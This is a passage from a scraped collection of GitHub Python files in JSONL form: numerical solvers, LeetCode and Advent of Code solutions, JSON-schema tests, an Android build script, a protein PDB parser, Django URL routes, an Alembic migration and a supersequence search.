agree')\r\n\tn=b.size\r\n\tx_old=np.transpose(np.matrix(np.zeros(n)))\r\n\tD=np.diag(np.diag(A))\r\n\tL=np.diag(np.diag(A,-1),-1)\r\n\tU=np.diag(np.diag(A,1),1)\r\n\tDL_inv=np.linalg.inv(D+w*L)\r\n\tconv=1\r\n\tcounter=0\r\n\twhile(conv>tol):\r\n\t\tx_new=DL_inv*(((1-w)*D-w*U)*x_old+w*b)\r\n\t\t#print(x_new)\r\n\t\tconv=np.linalg.norm(x_new-x_old)\r\n\t\tx_old=x_new\r\n\t\tcounter=counter+1\r\n\tprint('counter= '+str(counter))\r\n\tprint('absolute error = '+str(conv))\r\n\treturn(x_new)\r\n#####################################################################################################\r\n# Script that executes when the program file is called from the command line.\r\nn=input(\"Enter number of equations in system: \")\r\nA=matrix_build(n)\r\nb=b_build(n)\r\nprint('JACOBI SOLVER:')\r\njacobi_ans=jacobi_solver(A,b)\r\nprint('jacobi answer:')\r\nprint(jacobi_ans)\r\nprint('\\n')\r\n\r\nprint('GAUSS-SEIDEL SOLVER:')\r\ngs_ans=gs_solver(A,b)\r\nprint('gs answer:')\r\nprint(gs_ans)\r\nprint('\\n')\r\n\r\n\r\nprint('SOR SOLVER:')\r\nsor_ans=sor_solver(A,b)\r\nprint('sor answer:')\r\nprint(sor_ans)\r\nprint('\\n')\r\n","repo_name":"MilosAtz/NE155","sub_path":"HW5/P4.py","file_name":"P4.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"72547674139","text":"class Solution:\n def splitArraySameAverage(self, A: List[int]) -> bool:\n n = len(A)\n summ = sum(A)\n if not any(i * summ % n == 0 for i in range(1, n // 2 + 1)):\n return False\n\n sums = [set() for _ in range(n // 2 + 1)]\n sums[0].add(0)\n\n for a in A:\n for i in range(n // 2, 0, -1):\n for val in sums[i - 1]:\n sums[i].add(a + val)\n\n for i in range(1, n // 2 + 1):\n if i * summ % n == 0 and i * summ // n in sums[i]:\n return True\n\n return False\n","repo_name":"Next-Gen-UI/Code-Dynamics","sub_path":"Leetcode/0805. Split Array With Same Average/0805.py","file_name":"0805.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"69"}
+{"seq_id":"36007723142","text":"# encoding: utf-8\n\n\"\"\"\n@version: 1.0\n@author: dawning\n@contact: dawning7670@gmail.com\n@time: 2017/3/27 17:12\n\"\"\"\n\nimport pytest\nfrom jsonschema import SchemaError\nfrom jsonschema.validators import validator_for\n\nfrom framework.validator.json_validator import JValidator\n\nconfig_with_simple_json = {\n \"opr\": {\n \"type\": \"string\",\n \"enum\": [\"collection\", \"pay_for\"]\n }\n}\n\nschema_with_simple_json = {\n \"$schema\": \"http://json-schema.org/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"opr\": {\"type\": \"string\", \"enum\": [\"collection\", \"pay_for\"]}\n }\n}\n\nconfig_with_array = {\n \"opr\": {\n \"type\": \"string\",\n \"enum\": [\"collection\", \"pay_for\"]\n },\n \"item\": [{\n \"bank_account\": {\"type\": \"string\", \"maxLength\": 19, \"maxLength\": 19},\n \"bank_account_name\": {\"type\": \"string\", \"maxLength\": 10, \"maxLength\": 4}\n }, {\n \"maxLength\": 5,\n \"minLength\": 1\n }]\n}\nschema_with_array = {\n \"$schema\": \"http://json-schema.org/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"opr\": {\"type\": \"string\", \"enum\": [\"collection\", \"pay_for\"]},\n \"item\": {\n \"type\": \"array\",\n \"maxLength\": 5,\n \"minLength\": 1,\n \"items\": {\n \"type\": \"object\",\n \"properties\": {\n \"bank_account\": {\"type\": \"string\", \"maxLength\": 19, \"maxLength\": 19},\n \"bank_account_name\": {\"type\": \"string\", \"maxLength\": 10, \"maxLength\": 4}\n }\n }\n }\n }\n}\n\nconfig_with_not_required = {\n \"opr\": {\"type\": \"string\", \"enum\": [\"collection\", \"pay_for\"]},\n \"account\": {\"type\": \"string\", \"maxLength\": 10, \"minLength\": 1},\n \"remark\": {\"type\": \"string\"},\n \"user_name\": {\"type\": \"integer\", \"maximum\": 99999, \"minimum\": 10000},\n \"realtime\": {\"type\": \"integer\", \"enum\": [0, 1]},\n \"agreement_id\": {\"type\": \"string\", \"maxLength\": 16, \"maxLength\": 16},\n \"not_required\": [\"remark\", \"realtime\"]\n}\nschema_with_not_required = {\n \"$schema\": \"http://json-schema.org/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"opr\": {\"type\": \"string\", \"enum\": [\"collection\", \"pay_for\"]},\n \"account\": {\"type\": \"string\", \"maxLength\": 10, \"minLength\": 1},\n \"remark\": {\"type\": \"string\"},\n \"user_name\": {\"type\": \"integer\", \"maximum\": 99999, \"minimum\": 10000},\n \"realtime\": {\"type\": \"integer\", \"enum\": [0, 1]},\n \"agreement_id\": {\"type\": \"string\", \"maxLength\": 16, \"maxLength\": 16}\n },\n \"required\": ['account', 'agreement_id', 'opr', 'user_name']\n}\n\nconfig_with_nest_json = {\n \"opr\": {\"type\": \"string\", \"enum\": [\"collection\", \"pay_for\"]},\n \"account\": {\"type\": \"string\", \"maxLength\": 10, \"minLength\": 1},\n \"user\": {\n \"username\": {\"type\": \"string\"},\n \"password\": {\"type\": \"integer\", \"maximum\": 999999, \"minimum\": 100000}\n }\n}\nschema_with_nest_json = {\n \"$schema\": \"http://json-schema.org/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"opr\": {\"type\": \"string\", \"enum\": [\"collection\", \"pay_for\"]},\n \"account\": {\"type\": \"string\", \"maxLength\": 10, \"minLength\": 1},\n \"user\": {\n \"type\": \"object\",\n \"properties\": {\n \"username\": {\"type\": \"string\"},\n \"password\": {\"type\": \"integer\", \"maximum\": 999999, \"minimum\": 100000}\n }\n }\n }\n}\n\nconfig_with_whole = {\n \"opr\": {\"type\": \"string\", \"enum\": [\"collection\", \"pay_for\"]},\n \"account\": {\"type\": \"string\", \"maxLength\": 10, \"minLength\": 1},\n \"item\": [\n {\n \"bank_account\": {\"type\": \"string\", \"maxLength\": 19, \"minLength\": 19},\n \"bank_account_name\": {\"type\": \"string\", \"maxLength\": 10, \"minLength\": 4},\n \"not_required\": [\"bank_account_name\"]\n }, {\n \"maxLength\": 5,\n \"minLength\": 1\n }],\n \"user\": {\n \"username\": {\"type\": \"string\"},\n \"password\": {\"type\": \"integer\", \"maximum\": 999999, \"minimum\": 100000},\n \"not_required\": [\"username\"]\n },\n \"not_required\": [\"account\"]\n}\n\nschema_with_whole = {\n \"$schema\": \"http://json-schema.org/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"opr\": {\"type\": \"string\", \"enum\": [\"collection\", \"pay_for\"]},\n \"account\": {\"type\": \"string\", \"maxLength\": 10, \"minLength\": 1},\n \"item\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"object\",\n \"properties\": {\n \"bank_account\": {\"type\": \"string\", \"maxLength\": 19, \"minLength\": 19},\n \"bank_account_name\": {\"type\": \"string\", \"maxLength\": 10, \"minLength\": 4}\n },\n \"required\": [\"bank_account\"]\n },\n \"maxLength\": 5,\n \"minLength\": 1\n },\n \"user\": {\n \"type\": \"object\",\n \"properties\": {\n \"username\": {\"type\": \"string\"},\n \"password\": {\"type\": \"integer\", \"maximum\": 999999, \"minimum\": 100000}\n },\n \"required\": [\"password\"]\n }\n },\n \"required\": [\"item\", \"opr\", \"user\"]\n}\nschema_config = {\n \"simple_json\": config_with_simple_json,\n \"array\": config_with_array,\n \"not_required\": config_with_not_required,\n \"nest_json\": config_with_nest_json,\n \"whole\": config_with_whole\n}\nvalidator = JValidator(schema_config)\n\n\ndef check(name, correct_schema):\n schema = validator.schema[name]\n cls = validator_for(schema)\n is_valid_schema = True\n try:\n cls.check_schema(schema)\n except SchemaError:\n is_valid_schema = False\n assert is_valid_schema\n assert schema == correct_schema\n\n\n# 测试单层json\ndef test_make_schema_with_simple_json():\n check(\"simple_json\", schema_with_simple_json)\n\n\n# 测试数组对象\ndef test_make_schema_with_array():\n check(\"array\", schema_with_array)\n\n\n# 测试not_required对象\ndef test_make_schema_with_not_required():\n check(\"not_required\", schema_with_not_required)\n\n\n# 测试嵌套json\ndef test_make_schema_with_nest_json():\n check(\"nest_json\", schema_with_nest_json)\n\n\n# 总体测试\ndef test_make_schema_whole():\n check(\"whole\", schema_with_whole)\n\n\nif __name__ == '__main__':\n args = [\"-vv\", \"--color\", \"yes\", \"test_json_validator.py\"]\n pytest.main(args)\n","repo_name":"lpj2721/protools","sub_path":"framework/tests/test_json_validator.py","file_name":"test_json_validator.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"24267196626","text":"import sys, os, shutil, subprocess, time, config\n\ndef buildWorkingDir():\n # Remove java gen folder\n if os.path.exists(config.javaGenDir):\n shutil.rmtree(config.javaGenDir)\n\n #Copy project template to build dir\n src = config.javaDir\n des = config.javaGenDir + os.sep + \"_asproject\"\n if os.path.exists(des):\n shutil.rmtree(des)\n \n print(\"\\033[1;34;40mFrom\\n\\033[0;37;40m\" + src)\n print(\"\\033[1;34;40mTo\\n\\033[0;37;40m\" + des)\n\n shutil.copytree(src, des)\n\n #Copy packed_data to _asproject\n src = config.dataGenDir + os.sep + \"packed_data.zip\"\n des = des + os.sep + \"app\" + os.sep + \"src\" + os.sep + \"main\" + os.sep + \"assets\"\n if os.path.exists(src):\n shutil.copy(src, des)\n\n \n print(\"\\n\")\n \ndef buildJava():\n print(\"===========================================================\")\n print(\" \\033[1;32;40mBUILD JAVA\\033[0;37;40m\")\n print(\"===========================================================\")\n\n if config.hostType == \"windows\":\n gradleExec = config.gradleExecWin\n elif config.hostType == \"linux\":\n gradleExec = config.gradleExecLinux\n \n if config.buildType == \"release\":\n cmd = config.javaDir + os.sep + gradleExec + \" assembleRelease -p \" + config.javaGenDir + os.sep + \"_asproject\" + \" --profile\"\n subprocess.call(cmd, shell=True)\n #Enable in next version\n #cmd = config.javaDir + os.sep + gradleExec + \" testReleaseUnitTest -p \" + config.javaGenDir + os.sep + \"_asproject\"\n #subprocess.call(cmd, shell=True)\n else:\n cmd = config.javaDir + os.sep + gradleExec + \" assembleDebug -p \" + config.javaGenDir + os.sep + \"_asproject\" + \" --profile\"\n subprocess.call(cmd, shell=True)\n #Enable in next version\n #cmd = config.javaDir + os.sep + gradleExec + \" testDebugUnitTest -p \" + config.javaGenDir + os.sep + \"_asproject\"\n #subprocess.call(cmd, shell=True)\n #print(cmd)\n #subprocess.call(cmd, shell=True)\n \n print(\"\\n\")\n\ndef buildPackage():\n print(\"===========================================================\")\n print(\" \\033[1;32;40mBUILD PACKAGE\\033[0;37;40m\")\n print(\"===========================================================\")\n \n if config.buildType == \"release\":\n src = config.javaGenDir + os.sep + \"_asproject\" + os.sep + \"app\" + os.sep + \"build\" + os.sep + \"outputs\" + os.sep + \"apk\" + os.sep + \"release\" + os.sep + \"app-release.apk\"\n des = config.rootGenDir + os.sep + \"apks\"\n \n print(\"\\033[1;34;40mFrom:\\n\\033[0;37;40m\" + src)\n print(\"\\033[1;34;40mTo\\n\\033[0;37;40m\" + des)\n \n if not os.path.exists(des):\n os.mkdir(des)\n des += os.sep + config.outputFile + \"-\" + config.versionCode + \"-\" + config.versionName + \"-release.apk\"\n shutil.copyfile(src, des)\n else:\n src = config.javaGenDir + os.sep + \"_asproject\" + os.sep + \"app\" + os.sep + \"build\" + os.sep + \"outputs\" + os.sep + \"apk\" + os.sep + \"debug\" + os.sep + \"app-debug.apk\"\n des = config.rootGenDir + os.sep + \"apks\"\n \n print(\"\\033[1;34;40mFrom:\\n\\033[0;37;40m\" + src)\n print(\"\\033[1;34;40mTo\\n\\033[0;37;40m\" + des)\n \n if not os.path.exists(des):\n os.mkdir(des)\n des += os.sep + config.outputFile + \"-\" + config.versionCode + \"-\" + config.versionName + \"-debug.apk\"\n shutil.copyfile(src, des)\n\n \n print(\"\\n\")\n\ndef main(argv):\n start = time.time()\n print(\"===========================================================\")\n print(\" \\033[1;32;40mBUILD APPLICATION\\033[0;37;40m\")\n print(\"===========================================================\")\n \n print(str(argv))\n config.buildProjectPath(argv[0], argv[1], argv[2], argv[3])\n \n buildWorkingDir()\n \n buildJava()\n \n buildPackage()\n\n elapsedTime = time.time() - start\n print(\"Running time: %s s\" % str(elapsedTime))\n\nif __name__ == '__main__':\n main(sys.argv[1:])","repo_name":"cs50vn/virustracker-android","sub_path":"scripts/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":4054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"24321580296","text":"import numpy as np\nimport pandas as pd\nimport sys\nimport os\nimport pickle\nimport itertools\nfrom tqdm import tqdm\nfrom scipy.spatial.distance import squareform, pdist\n\n\"\"\"\nSimple .pdb parser for collecting spatial info of atoms and such. \n\"\"\"\n\nAA_LIST = [\"ALA\", \"ARG\", \"ASN\", \"ASP\", \"CYS\", \"GLN\", \"GLU\", \"GLY\", \"HIS\",\n \"ILE\", \"LEU\", \"LYS\", \"MET\", \"PHE\", \"PRO\", \"SER\", \"THR\", \"TRP\",\n \"TYR\", \"VAL\"]\n\n\ndef parse_pdb_file(protein_name, filepath):\n print(filepath)\n lines = open(filepath, 'r').readlines()\n atom_name = []\n residue_name = []\n residue_number = []\n x_coord = []\n y_coord = []\n z_coord = []\n element = []\n for line in lines:\n if line[0:7].strip() == \"ATOM\":\n atom_name.append(line[13:17].strip())\n residue_name.append(line[17:21].strip())\n residue_number.append(int(line[23:26].strip()))\n x_coord.append(float(line[31:39].strip()))\n y_coord.append(float(line[39:47].strip()))\n z_coord.append(float(line[47:55].strip()))\n element.append(line[77:79].strip())\n protein = pd.DataFrame({\n 'atom_name': atom_name,\n 'residue_name': residue_name,\n 'residue_number': residue_number,\n 'x': x_coord,\n 'y': y_coord,\n 'z': z_coord,\n 'element': element})\n protein['aa_index'] = protein[\"residue_name\"].apply(\n lambda x: AA_LIST.index(x))\n\n with open(\"processed_pdb/\" + protein_name[:-4] + \"_dataset.pkl\", \"wb\") as f:\n pickle.dump(protein, f)\n return protein\n\n\ndef filter_dataset_CA(protein_name, dataset, save=True):\n \"\"\"\n Filter only the CA atoms from a given dataset.\n Returns the list of datasets. \n \"\"\"\n filtered_dataset = dataset[dataset[\"atom_name\"] == \"CA\"]\n if save:\n with open(\"processed_pdb/\" + protein_name + \"_CA_data.pkl\", \"wb\") as f:\n pickle.dump(filtered_dataset, f)\n return filtered_dataset\n\n\ndef make_coordinate_dataset_CA(protein_name, dataset):\n \"\"\"\n Returns only the coordinates of a dataset.\n \"\"\"\n filtered_dataset = filter_dataset_CA(protein_name, dataset, False)\n coordinates = filtered_dataset[[\"x\", \"y\", \"z\"]].values\n coordinates -= coordinates.mean(axis=0)\n coordinates /= np.linalg.norm(coordinates, axis=0)\n data_coords = pd.DataFrame(coordinates,\n columns=(\"x\", \"y\", \"z\"))\n with open(\"processed_pdb/\" + protein_name + \"_CA_coords.pkl\", \"wb\") as f:\n pickle.dump(data_coords, f)\n return data_coords\n\n\ndef process_distance_matrix_CA_scipy(protein_name, dataset):\n filtered_dataset = filter_dataset_CA(protein_name, dataset, False)\n dist_matrix = squareform(pdist(filtered_dataset[[\"x\", \"y\", \"z\"]], metric='euclidean'))\n with open(\"processed_pdb/\" + protein_name + \"_CA_dist.pkl\", \"wb\") as f:\n pickle.dump(dist_matrix, f)\n return dist_matrix\n\n\ndef process_distance_matrix_CA(protein_name, dataset):\n filtered_dataset = filter_dataset_CA(protein_name, dataset, False)\n N = len(filtered_dataset)\n dist_matrix = np.zeros((N, N))\n for i, j in tqdm(itertools.combinations(range(N), 2)):\n a = np.array([filtered_dataset.iloc[i][\"x\"],\n filtered_dataset.iloc[i][\"y\"],\n filtered_dataset.iloc[i][\"z\"]])\n b = np.array([filtered_dataset.iloc[j][\"x\"],\n filtered_dataset.iloc[j][\"y\"],\n filtered_dataset.iloc[j][\"z\"]])\n dist_matrix[i][j] = np.linalg.norm(a - b)\n dist_matrix[j][i] = dist_matrix[i][j]\n with open(\"processed_pdb/\" + protein_name + \"_CA_dist.pkl\", \"wb\") as f:\n pickle.dump(dist_matrix, f)\n return dist_matrix\n\n\ndef unload_all(directory=\"processed_pdb\"):\n with open(directory + \"/names.pkl\", 'rb') as f:\n names = pickle.load(f)\n datasets = []\n filtered_datasets = []\n data_coords = []\n dist_matrices = []\n for name in names:\n with open(\"processed_pdb/\" + name + \"_dataset.pkl\", \"rb\") as f:\n datasets.append(pickle.load(f))\n with open(\"processed_pdb/\" + name + \"_CA_data.pkl\", \"rb\") as f:\n filtered_datasets.append(pickle.load(f))\n with open(\"processed_pdb/\" + name + \"_CA_coords.pkl\", \"rb\") as f:\n data_coords.append(pickle.load(f))\n with open(\"processed_pdb/\" + name + \"_CA_dist.pkl\", \"rb\") as f:\n dist_matrices.append(pickle.load(f))\n return names, datasets, filtered_datasets, data_coords, dist_matrices\n\n\nif __name__ == \"__main__\":\n if not os.path.exists(\"processed_pdb\"):\n os.makedirs(\"processed_pdb\")\n if len(sys.argv) == 1:\n directory = \"pdb_files\"\n else:\n directory = sys.argv[1]\n items = os.listdir(directory)\n files = []\n names = []\n datasets = []\n for name in items:\n if name.endswith(\".pdb\"):\n files.append(name)\n names.append(name[: -4])\n\n for name in files:\n protein = parse_pdb_file(name, directory + \"/\" + name)\n datasets.append(protein)\n \n with open(\"processed_pdb\" + \"/names.pkl\", 'wb') as f:\n pickle.dump(names, f)\n \n namefile = open(\"processed_pdb/names.txt\", 'w')\n\n for i, name in enumerate(names):\n namefile.write(name + \"\\n\")\n _ = filter_dataset_CA(name, datasets[i])\n _ = make_coordinate_dataset_CA(name, datasets[i])\n _ = process_distance_matrix_CA_scipy(name, datasets[i])\n","repo_name":"carlidel/protein-reconstruction","sub_path":"pdb_processing.py","file_name":"pdb_processing.py","file_ext":"py","file_size_in_byte":5427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23567532880","text":"\"\"\"GestaoDePraticasDiarias_v6 URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n #========== VERB ==========#\n path('verbs/', views.ListVerb.as_view(), name='verb_list'),\n path('verb/', views.DetailVerb.as_view(), name='verb_detail'),\n path('create_verb/', views.CreateVerb.as_view(), name='verb_create'),\n path('update_verb/',\n views.UpdateVerb.as_view(),\n name='verb_update'),\n path('delete_verb/',\n views.DeleteVerb.as_view(),\n name='verb_delete'),\n #========== VERB ==========#\n \n \n \n #========== SENTENCE ==========#\n path('sentences/', views.ListSentence.as_view(), name='sentence_list'),\n path('sentence/', views.DetailSentence.as_view(),\n name='sentence_detail'),\n path('create_sentence/', views.CreateSentence.as_view(),\n name='sentence_create'),\n path('update_sentence/',\n views.UpdateSentence.as_view(),\n name='sentence_update'),\n path('delete_sentence/',\n views.DeleteSentence.as_view(),\n name='sentence_delete'),\n #========== SENTENCE ==========#\n \n \n \n #========== GROUP ==========#\n path('groups/', views.ListGroup.as_view(), name='group_list'),\n path('group/', views.DetailGroup.as_view(),\n name='group_detail'),\n path('create_group/', views.CreateGroup.as_view(),\n name='group_create'),\n path('update_group/',\n views.UpdateGroup.as_view(),\n name='group_update'),\n path('delete_group/',\n views.DeleteGroup.as_view(),\n name='group_delete'),\n #========== GROUP ==========#\n\n \n \n #========== PATTERN ==========#\n path('patterns/', views.ListPattern.as_view(), name='pattern_list'),\n path('pattern/', views.DetailPattern.as_view(),\n name='pattern_detail'),\n path('create_pattern/', views.CreatePattern.as_view(),\n name='pattern_create'),\n path('update_pattern/',\n views.UpdatePattern.as_view(),\n name='pattern_update'),\n path('delete_pattern/',\n views.DeletePattern.as_view(),\n name='pattern_delete'),\n #========== PATTERN ==========#\n \n \n \n #========== RESOURCE ==========#\n path('resources/', views.ListResource.as_view(), name='resource_list'),\n path('resource/', views.DetailResource.as_view(),\n name='resource_detail'),\n path('create_resource/', views.CreateResource.as_view(),\n name='resource_create'),\n path('update_resource/',\n views.UpdateResource.as_view(),\n name='resource_update'),\n path('delete_resource/',\n views.DeleteResource.as_view(),\n name='resource_delete'),\n #========== RESOURCE ==========#\n \n \n \n #========== ARTEFACT ==========#\n path('artefacts/', views.ListArtefact.as_view(), name='artefact_list'),\n path('artefact/', views.DetailArtefact.as_view(),\n name='artefact_detail'),\n path('create_artefact/', views.CreateArtefact.as_view(),\n name='artefact_create'),\n path('update_artefact/',\n views.UpdateArtefact.as_view(),\n name='artefact_update'),\n path('delete_artefact/',\n views.DeleteArtefact.as_view(),\n name='artefact_delete'),\n #========== ARTEFACT ==========#\n]\n","repo_name":"fosquito/Daily-practice-management","sub_path":"Activities/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"20200250185","text":"file = open(\"12-1.in\", \"r\")\n# file = open(\"12-1.in.sample\", \"r\")\n\ndef parse_node(node_id, children):\n for child in children:\n if child not in connected:\n connected.add(child)\n parse_node(child, connections[child])\n\nconnections = {}\nfor line in file:\n node_id, con_str = line.strip().split(\" <-> \")\n connections[int(node_id)] = [int(x) for x in con_str.split(\", \")]\n\nconnected = set()\nset_count = 1\nparse_node(0, connections[0])\nfor i in range(2000):\n if i not in connected:\n set_count += 1\n parse_node(i, connections[i])\n\nprint(len(connected))\nprint(set_count)\n","repo_name":"davidkiger/aoc2017","sub_path":"12-2.py","file_name":"12-2.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38613292114","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n # Sol 1. DFS Pre-Order Traverse\n def sumNumbers(self, root: TreeNode) -> int:\n if not root:\n return 0\n \n each_path = []\n total_path_sum = 0\n \n def pre_order_traverse(node, so_far):\n if not node.left and not node.right: # means it reaches the end of each leaf\n each_path.append(\"\".join(so_far+[str(node.val)]))\n \n if node.left: # means it goes to the left subtree\n pre_order_traverse(node.left, so_far+[str(node.val)])\n \n if node.right: # right subtree\n pre_order_traverse(node.right, so_far+[str(node.val)])\n \n pre_order_traverse(root,[])\n \n # print(each_path)\n \n for x in each_path:\n total_path_sum += int(x)\n \n return total_path_sum\n # TC: O(n), need to check all element\n # SC: O(g), where g is the number of leaf node. g = ceil(n/2)\n # Runtime: 28 ms, faster than 87.12%\n # Memory Usage: 14 MB, less than 38.06% ","repo_name":"ssong86/leetcode-problem-solving","sub_path":"June-LeetCoding-Challenge-2020/Week4/129-sum-root-to-leaf-numbers.py","file_name":"129-sum-root-to-leaf-numbers.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36613126414","text":"\"\"\"create topics table\n\nRevision ID: 6f247da76f69\nRevises: \nCreate Date: 2023-07-07 17:07:31.443571\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"01_6f247da76f69\"\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n op.create_table(\n \"topics\",\n sa.Column(\"id\", sa.UUID(), nullable=False, primary_key=True, index=True),\n sa.Column(\n \"created_at\",\n sa.DateTime(timezone=True),\n nullable=False,\n server_default=sa.func.now(),\n ),\n sa.Column(\n \"last_modified_at\",\n sa.DateTime(timezone=True),\n nullable=True,\n onupdate=sa.func.now(),\n ),\n sa.Column(\"description\", sa.String(length=250), nullable=True),\n sa.Column(\n \"is_deleted\", sa.Boolean(), nullable=False, server_default=sa.false()\n ),\n sa.Column(\"title\", sa.String(length=128), nullable=False),\n sa.Column(\"topic_id\", sa.UUID(), nullable=True),\n sa.ForeignKeyConstraint(\n [\"topic_id\"],\n [\"topics.id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n\n\ndef downgrade() -> None:\n op.drop_index(op.f(\"ix_topics_id\"), table_name=\"topics\")\n op.drop_table(\"topics\")\n","repo_name":"dannytannertantrum/quiz-app","sub_path":"backend/alembic/versions/01_6f247da76f69_create_topics_table.py","file_name":"01_6f247da76f69_create_topics_table.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18926545945","text":"def calculate_metrics(TP, FP, TN, FN):\n recall = TP / (TP + FN)\n \n accuracy = (TP + TN) / (TP + TN + FP + FN)\n \n precision = TP / (TP + FP)\n \n f1_score = (2 * precision * recall) / (precision + recall)\n \n return recall, accuracy, precision, f1_score\n\n# TP, FP, TN, FN values\nTP= 138 \nFP= 4\nTN= 175\nFN= 58\n\nrecall, accuracy, precision, f1_score = calculate_metrics(TP, FP, TN, FN)\n\nprint(\"Recall:\", recall)\nprint(\"Precision:\", precision)\nprint(\"Accuracy:\", accuracy)\nprint(\"F1 Score:\", f1_score)\n","repo_name":"REVVVY/Breathing_Bag_Defect","sub_path":"scripts/metrics_calc.py","file_name":"metrics_calc.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4844441549","text":"import math\nimport copy\nimport time\nimport sys\nimport random\nimport copy\n#Smallest supersequence found so far\nbest_string = None\n#Length of smallest supersequence\nbest_string_length = math.inf\nstarting_time = None\nticks = 0\nticks_max = 1000\n#Adds substring to end of string\ndef add_substring(string, substring):\n if substring in string:\n return string\n length = len(substring)\n while(True):\n if string[-length:] == substring[:length]:\n string += substring[length:]\n break\n length -= 1\n return string\n\ndef permutation_string(permutation, substrings):\n string = ''\n for number in permutation:\n string = add_substring(string, substrings[number])\n return string\n\ndef swap_permutation(permutation, swap_number):\n new_permutation = copy.deepcopy(permutation)\n new_permutation[swap_number], new_permutation[swap_number + 1] = new_permutation[swap_number + 1], new_permutation[swap_number]\n return new_permutation\n\n#DFS search for smallest supersequence. Runs for a max of 10 seconds\ndef complete_DFS(string, substrings, search_time=10):\n global best_string\n global best_string_length\n global ticks\n ticks += 1\n if ticks == ticks_max:\n current_time = time.time()\n if current_time - starting_time > search_time:\n output_best()\n ticks = 0\n #Calculate if string generated is the smallest found\n if not substrings:\n string_length = len(string)\n if string_length < best_string_length:\n best_string = string\n best_string_length = string_length\n substring_tries = [(substring, add_substring(string, substring)) for substring in substrings]\n #Sort in order of length \n substring_tries = sorted(substring_tries, key=lambda x: len(x[1]))\n #string is too long. At sometime we will have to add this substring!\n if not substring_tries or len(substring_tries[-1][1]) >= best_string_length:\n return\n #DFS search\n while substring_tries:\n substring = substring_tries[0]\n substring_tries.remove(substring)\n substrings.remove(substring[0])\n complete_DFS(substring[1], substrings, search_time)\n substrings.append(substring[0])\ndef local_search(substrings, iterations=1000, search_time=10, print_string=True):\n global best_string\n global best_string_length\n global ticks\n num_substrings = len(substrings)\n current_permutation = range(num_substrings)\n while(True):\n current_permutation = random.sample(current_permutation, num_substrings)\n for _ in range(iterations):\n ticks += 1\n if ticks == ticks_max:\n current_time = time.time()\n if current_time - starting_time > search_time:\n if print_string == True:\n output_best()\n ticks = 0\n return\n ticks = 0\n random_choice = random.randrange(2)\n #Random move\n if random_choice == 0:\n swap_number = random.randrange(0, num_substrings - 1)\n current_permutation = swap_permutation(current_permutation, swap_number)\n else:\n permutation_swaps = [None for _ in range(num_substrings - 1)]\n new_strings = [None for _ in range(num_substrings - 1)]\n for num in range(num_substrings - 1):\n permutation_swaps[num] = swap_permutation(current_permutation, num)\n new_strings[num] = permutation_string(current_permutation, substrings)\n permutation_lengths = [len(swap) for swap in new_strings]\n min_index = permutation_lengths.index(min(permutation_lengths))\n current_permutation = swap_permutation(current_permutation, min_index)\n new_string = permutation_string(current_permutation, substrings)\n if len(new_string) < best_string_length:\n best_string = new_string\n best_string_length = len(new_string)\n\n\n\n#Outputs best string found so far and exits program\ndef output_best():\n print(\"Best sequence found: \", best_string)\n print(\"Sequence Length: \", best_string_length)\n sys.exit()\n\n#Read input and run DFS on subsequences\ndef main():\n global starting_time\n filename = sys.argv[1]\n with open(filename) as f:\n _ = int(f.readline())\n _ = int(f.readline())\n subsequences = []\n sequence = None\n while(sequence != ''):\n sequence = f.readline()\n if sequence != '':\n #Drop newline\n subsequences.append(sequence[:-1])\n\n starting_time = time.time()\n local_search(subsequences, search_time=5, print_string=False)\n starting_time = time.time()\n complete_DFS('', subsequences, search_time=5)\n output_best() \nif __name__ == '__main__':\n main()","repo_name":"gnbpdx/AI-ML","sub_path":"superseq.py","file_name":"superseq.py","file_ext":"py","file_size_in_byte":4919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
